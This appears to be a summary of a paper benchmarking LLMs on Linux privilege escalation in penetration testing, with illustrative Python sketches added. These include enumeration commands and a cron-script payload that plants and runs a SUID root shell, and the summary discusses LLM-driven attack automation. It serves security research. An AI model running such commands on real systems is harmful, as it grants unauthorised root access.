Core Concepts
Large Language Models (LLMs) are explored for their capabilities and limitations when applied to privilege escalation during penetration testing.
Abstract
ABSTRACT:
Penetration testing is crucial for identifying vulnerabilities in systems.
Large Language Models (LLMs) can be used to automate pen-testing tasks.
A benchmark was created to evaluate LLMs' performance in Linux privilege escalation.
INTRODUCTION:
Linux privilege escalation involves gaining elevated access to resources.
LLMs show potential for automating and enhancing pen-testing tasks (a minimal enumeration sketch follows below).
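As an illustration of what such automation looks like in practice, the following Python sketch shows the kind of enumeration commands an LLM-driven agent might issue on a target host. The command list and the enumerate_host helper are illustrative assumptions, not taken from the paper's benchmark.

```python
# Minimal sketch, not from the paper: enumeration commands an LLM-driven
# agent might run when looking for privilege-escalation vectors.
import subprocess

ENUM_COMMANDS = [
    "id",                                      # current user and groups
    "sudo -l",                                 # sudo rules available to the user
    "find / -perm -4000 -type f 2>/dev/null",  # SUID binaries
    "cat /etc/crontab",                        # system-wide cron jobs
]

def enumerate_host() -> dict[str, str]:
    """Run each enumeration command locally and collect its stdout."""
    results = {}
    for cmd in ENUM_COMMANDS:
        proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        results[cmd] = proc.stdout
    return results

if __name__ == "__main__":
    for cmd, output in enumerate_host().items():
        print(f"$ {cmd}\n{output}")
```

In an agent loop, the output of these commands would be fed back to the model as context for choosing the next command.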
METHODOLOGY:
A Design Science approach was used to create a benchmark for Linux privilege escalation.
Vulnerability classes were derived from common exploits identified in CTF challenges (an illustrative test-case layout is sketched below).
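As a hedged illustration of how such a benchmark could be organized by vulnerability class, the sketch below defines a hypothetical test-case structure; the class names, fields, and success checks are assumptions, not the paper's actual schema.

```python
# Hypothetical layout of benchmark test cases grouped by vulnerability class;
# names, fields, and success checks are illustrative assumptions.
from dataclasses import dataclass

@dataclass
class TestCase:
    name: str           # identifier of the vulnerable VM or container
    vuln_class: str     # e.g. "suid-binary", "sudo-misconfiguration"
    hint: str           # optional high-level guidance shown to the LLM
    success_check: str  # command whose output proves root was obtained

CASES = [
    TestCase(
        name="suid-gtfobin",
        vuln_class="suid-binary",
        hint="Look for SUID binaries that can spawn a shell.",
        success_check="id -u",  # expect "0" once escalation succeeded
    ),
    TestCase(
        name="sudo-all",
        vuln_class="sudo-misconfiguration",
        hint="Check which commands the user may run via sudo.",
        success_check="sudo -n id -u",
    ),
]
```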
RESULTS:
GPT-4 excelled at detecting file-based exploits, while GPT-3.5-turbo struggled.
Locally-run LLMs had limited success compared to cloud-based models.
EVALUATION:
High-level guidance improved exploitation rates significantly.
Context size impacted model performance, with larger sizes benefiting certain models.
DISCUSSION:
Quality of generated commands varied among LLMs, with some struggling with syntax and logic.
Multi-step exploits posed challenges for LLMs, highlighting the importance of maintaining causal connections between steps (see the sketch below).
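The following sketch, built around a hypothetical world-writable script run by a root cron job (an assumption, not an example from the paper), illustrates why such chains are hard: each command is only meaningful given the output of the previous one, so the model must keep the causal chain in context.

```python
# Illustrative multi-step chain (an assumption, not the paper's code): a
# hypothetical world-writable script executed by a root cron job. Each step
# only makes sense given the result of the previous one.
STEPS = [
    # Step 1: discover a root cron job that runs a script.
    "cat /etc/crontab",
    # Step 2: check whether that script is writable (path is hypothetical).
    "ls -l /usr/local/bin/backup.sh",
    # Step 3: only if step 2 showed write access, append a payload that
    # installs a SUID shell the next time the cron job fires.
    "echo 'cp /bin/bash /tmp/rootsh && chmod u+s /tmp/rootsh'"
    " >> /usr/local/bin/backup.sh",
    # Step 4: after waiting for the cron run, use the SUID shell.
    "/tmp/rootsh -p -c id",
]
print("\n".join(STEPS))
```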
Stats
GPT-4 was shown to be well suited to detecting file-based vulnerabilities, solving 75-100% of the test cases.
GPT-3.5-turbo solved only 25-50% of the cases, and the locally run model Llama2 failed to detect any vulnerabilities.